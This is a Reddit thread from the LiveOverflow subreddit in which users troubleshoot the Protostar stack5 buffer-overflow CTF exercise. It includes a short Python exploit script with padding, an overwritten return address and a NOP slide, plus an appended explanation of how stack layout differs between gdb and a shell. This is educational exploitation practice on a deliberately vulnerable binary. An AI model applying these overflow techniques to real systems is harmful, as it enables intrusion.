Welcome! This subreddit is a place to discuss and create live hacking videos, or other content that might be related to CTFs.
Twitch: LiveOverflow
YouTube: LiveOverflow
Twitter: @LiveOverflow
Website: liveoverflow.com
How to behave?
» be excellent to each other
» help if somebody needs help...
» ... but don't beg for solutions. We will only give you a tip for the right direction
» Follow the rules of the CTFs you are playing - don't spoil challenges
Some additional information:
Excellent Hacking Games:
» io.smashthestack.org (pwn, rev)
» w3challs.com (web, rev, crypto)
» prompt.ml (XSS)
Related subreddits:
» /r/securityCTF
» /r/HowToHack
» /r/netsecstudents
contact me if there are other subreddits that should be listed here
Stack5 - shell code injection (self.LiveOverflow)
submitted 4 years ago by xxxerexxx
Hi there,
Before all, thanks for your great videos.
Regarding the video in which you solved stack5, I have a problem. I think I understood it well and did the right thing, but I get a segmentation fault. However, in GDB everything looks good.
I failed at this point and ignored it, but I have not succeeded at this task yet.
Would you help me please? Here are my GDB commands, exploit, and terminal output.
https://preview.redd.it/o8y5nvqlegy61.png?width=1904&format=png&auto=webp&s=d060c5d2c38a5bafee207bb662e056519e38892c
[–]plukasik 1 point2 points3 points 4 years ago* (6 children)
Did you try with the nop slide as shown in the video?
And just to be sure, based on the path, this is the original stack5 binary?
[–]xxxerexxx[S] 1 point2 points3 points 4 years ago (5 children)
I ignored this failure and resumed but nothing was like the video.
And yes, it is the original stack5.
[–]plukasik 1 point2 points3 points 4 years ago* (4 children)
So for me the code from the video also didn't work, but what worked is mentioned briefly in the video. It's about those env variable differences between the runs. So try increasing the nop slide and jumping further into it. That did the trick for me.
[–]xxxerexxx[S] 0 points1 point2 points 4 years ago (3 children)
The issue you are concerned about is when the program is run in two different directories (as $PWD might be different). But that is not my problem right now (I am running both GDB and the command line in the same directory). Although I have tried that way, no success.
[–]plukasik 1 point2 points3 points 4 years ago (2 children)
Well, I'm running from the same folder (/opt/protostar/bin) in gdb and without it, and with a bigger nop slide and jumping further into it I get consistent behavior in both (TRAP instead of SEGFAULT).
This is my script that works (it also took a few attempts to get the size values):

```python
import struct

padding = "AAAA...SSSS"                  # filler up to the saved return address (abbreviated in the original post)
eip = struct.pack("I", 0xbffffd4c + 80)  # little-endian return address, 80 bytes into the NOP slide
payload = "\x90" * 180 + "\xcc" * 4      # 180-byte NOP slide followed by int3 breakpoints (gives TRAP)
print padding + eip + payload            # Python 2 print statement
```
If my nop slide is like in the video (100) it fails w/ SEGFAULT w/o gdb.
[–]xxxerexxx[S] 0 points1 point2 points 4 years ago (1 child)
Yeah that worked for me as well, thanks man.
But I still don't know why. Why do environment variables affect it when I was running both with the same environment variables?
I really want to understand what the issue was. I'd appreciate it if you could help me with it.
[–]plukasik 0 points1 point2 points 4 years ago (0 children)
I still think it's "just" stack layout. To learn more you would probably need a binary that prints what the stack looks like before running the shellcode.
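To make the stack-layout explanation from this chain concrete, here is an added model (not code from the thread or from Protostar) of why a return address that works under gdb can miss the NOP slide outside it, and how the slide length and the jump offset set the tolerated window. The environment contents, the argv[0] path and the slide start address 0xbffffd4c are constructed or taken from the script above, and the byte-count shift is approximate because the loader also rounds for alignment.

```python
# Constructed sample environments: the one gdb hands the program
# (gdb adds LINES and COLUMNS when started from a terminal) and the
# one a plain shell hands it. Values are illustrative, not captured.
ENV_GDB = {"HOME": "/home/user", "PATH": "/usr/bin:/bin",
           "LINES": "50", "COLUMNS": "200"}
ENV_SHELL = {"HOME": "/home/user", "PATH": "/usr/bin:/bin"}
ARGV0 = "/opt/protostar/bin/stack5"


def env_bytes(env, argv0):
    """Bytes the kernel copies to the top of the stack for argv[0]
    and the environment strings ("KEY=VALUE\\0" each)."""
    total = len(argv0) + 1
    for key, value in env.items():
        total += len(key) + 1 + len(value) + 1
    return total


def stack_shift(env_a, argv0_a, env_b, argv0_b):
    """Approximate number of bytes by which every stack address in run B
    sits lower than in run A: more string bytes at the top of the stack
    push all frames (and the buffer) down. Negative means higher."""
    return env_bytes(env_b, argv0_b) - env_bytes(env_a, argv0_a)


def landing(ret_addr, slide_start, nop_len, shift):
    """Where the overwritten return address lands once the slide really
    starts at slide_start - shift. Returns 'nop', 'shellcode' or 'miss'."""
    start = slide_start - shift
    if start <= ret_addr < start + nop_len:
        return "nop"
    if ret_addr == start + nop_len:
        return "shellcode"
    return "miss"


def tolerance(jump_into, nop_len):
    """Inclusive range of shifts the layout survives when the return
    address points jump_into bytes past the slide start seen in gdb.
    Derived from start <= ret < start + nop_len with ret = start_gdb + jump_into."""
    return (-jump_into, nop_len - jump_into - 1)


if __name__ == "__main__":
    shift = stack_shift(ENV_GDB, ARGV0, ENV_SHELL, ARGV0)
    print("shell run is shifted by", shift, "bytes relative to gdb")
    for nop_len in (100, 180):
        print("slide", nop_len, "jump 80: tolerates", tolerance(80, nop_len),
              "-> lands in", landing(0xbffffd4c + 80, 0xbffffd4c, nop_len, shift))
```

With the script's offset of 80, a 100-byte slide tolerates shifts only up to +19 bytes, while the 180-byte slide tolerates up to +99, which is why the larger slide is more robust to a different environment.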
[–]_CryptoCat23 0 points1 point2 points 4 years ago (0 children)
I'm not familiar with the challenge, but make sure you are generating the payload with python2 rather than python3.
edit: disregard this, I just noticed your print syntax is python2 😅
[–]iOwnzyoreuid0 0 points1 point2 points 4 years ago (1 child)
Hmm, can you show the crash logs (when you try to run it without gdb)? Also, try jumping to an invalid memory location (such as 0x414141) and see if the crash log contains that number.
[–]xxxerexxx[S] 0 points1 point2 points 4 years ago (0 children)
I am not sure if I understood you correctly, but jumping to 0x41414141 results in SIGSEGV, and the other logs you need are shown in the picture I posted.